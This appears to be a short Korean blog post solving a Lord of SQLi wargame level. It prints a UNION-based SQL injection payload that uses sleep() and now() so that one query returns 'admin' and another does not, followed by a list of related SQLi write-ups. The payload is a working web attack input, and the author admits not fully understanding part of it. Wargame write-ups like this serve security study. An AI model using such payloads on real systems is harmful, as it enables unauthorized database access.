query1, query2가 있다.
query1 결과의 id != admin ->> sandbox1
query1 결과의 id == admin ->> sandbox2
query2 결과의 id == admin ->> sandbox
?? 쿼리를 계속 변하게 해야한다는 것인가,,,
이해하고 넘어가는 걸로...
?no=1 union select concat(lower(hex(10+(!sleep(1)&&now()%2=1))), 0x646d696e)#' union select concat(lower(hex(9+(!sleep(1)&&now()%2=1))), 0x646d696e)#
- !sleep(1)&&now()%2=1 현재 시간에 따라 0 혹은 1을 반환한다. -> 왜 인지는 모르겠다...
- hex(10+0) = A/ hex(10+1) = B
- lower 후 concat로 0x646d696e("dmin") -> admin or bdmin
'워게임 > LOS' 카테고리의 다른 글
| zombie(quine대신 quine하기) (0) | 2021.10.10 |
|---|---|
| ouroboros(quine sql injection) (0) | 2021.10.09 |
| phantom(서브쿼리) (0) | 2021.10.09 |
| frankenstein(error based sqli) (0) | 2021.10.09 |
| blue_dragon(time based sql injection) (0) | 2021.10.09 |
댓글